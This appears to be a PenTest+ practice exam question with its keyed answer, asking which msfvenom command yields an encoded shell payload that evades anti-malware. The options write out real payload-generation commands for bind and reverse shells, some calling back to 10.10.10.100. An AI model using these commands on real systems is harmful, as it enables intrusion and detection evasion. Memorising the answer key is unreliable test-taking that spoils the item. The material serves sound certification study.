CompTIA PenTest+ (PT0-003) — Question 186

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by anti-malware that is running on the target.

Which of the following commands should the tester use to obtain shell access?

Answer options

• A. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443
• B. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
• C. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none
• D. net user add /administrator | hexdump > payload

Correct answer: A

Explanation

The correct answer is A because it uses an encoder specifically designed to obfuscate the payload, making it less likely to be detected by anti-malware solutions. Options B and C do not utilize an encoder, which may lead to detection. Option D does not provide a valid method for obtaining shell access.